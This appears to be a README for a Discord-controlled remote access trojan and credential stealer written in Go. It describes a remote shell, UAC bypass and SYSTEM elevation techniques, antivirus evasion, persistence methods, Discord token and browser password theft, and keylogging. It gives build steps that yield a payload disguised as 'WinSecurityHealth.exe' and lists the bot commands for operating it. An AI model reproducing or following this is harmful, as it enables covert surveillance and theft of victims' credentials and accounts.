lightweight discord rat & stealer written in go
status: beta - still coding new features but everything here is stable
- remote shell - full cmd & powershell access from discord
- privilege escalation - uac bypass methods + system elevation (nt authority\system)
- stealth module - peb unlinking, api hooking, name spoofing to dodge detection
- discord c2 - manage your bots straight from a discord server
- persistence - survives reboots through multiple methods
- data exfil - grabs discord tokens & browser data (passwords, cookies, bookmarks, etc)
- live surveillance - screenshot command for realtime desktop viewing
- keylogger - captures keystrokes with chacha20 encryption
- self destruct - nukes itself from the system on command
- tiny payload - under 3mb compiled
check out the changelog for latest updates
lets be real - this is a poc not some nation-state shit, built without heavy obfuscation so any decent reverse engineer can crack it open in ida
right now? "semi-ud" - slips past most basic avs but dont expect miracles
defender & similar av's will probably catch it eventually
dead simple process:
- install go if you dont have it
- run
build.bat - paste your bot token and server id when prompted
- done - your payload is
WinSecurityHealth.exe(you can rename this btw)
run these in your discord bot channel
!help- shows command list!privs/!whoami- checks current privileges (admin, system, etc)!cmd <command>- executes cmd command!shell <command>/!ps <command>- runs powershell command!screen- captures screenshot!exit/!kill- panic button - self destructs and removes traces
!tokengrab/!tokens- steals all discord tokens!browser/!browserdata- dumps browser passwords, cookies, history, bookmarks
!admin [method]/!elevate/!uac- attempts uac bypass- methods:
fodhelper,eventvwr,sdclt,computerdefaults - leave blank to try all methods automatically
- methods:
!system [method]/!nt/!authority- elevates to system (requires admin first)- methods:
pipe,token,task
- methods:
!hide [method]/!rootkit- activates stealth features- methods:
peb,hook,spoof,all
- methods:
!stealth- checks active stealth methods!persist/!persistence- enables persistence mechanisms!unpersist- removes persistence
!keylogger <action>/!keylogger <action>- controls keylogger- actions:
start,stop,status
- actions:
!keys/!keylogs- dumps captured keystrokes
multiple uac bypass methods:
- fodhelper registry hijack
- eventvwr mmc bypass
- sdclt registry manipulation
- computerdefaults hijack
system elevation techniques:
- named pipe impersonation
- token duplication
- scheduled task exploitation
- peb unlinking - hides from process enumeration
- api hooking - not implemented yet, but i will soon
- name spoofing - masquerades as legitimate processes
- registry run keys (current user & local machine)
- startup folder deployment
- scheduled tasks (multiple triggers)
- wmi event subscription
supports chromium browsers:
- chrome (including abe poc)
- edge, brave, opera, vivaldi
- beta/dev/canary versions
extracts:
- passwords (from chromium and gecko browsers)
- cookies
- autofill data
- bookmarks
- browsing history
discord token grabber:
- scans all discord installations (stable, ptb, canary)
- finds tokens in leveldb & local storage
- low-level keyboard hook
- chacha20 encryption for stored logs
- logs stored in chrome cache dir for stealth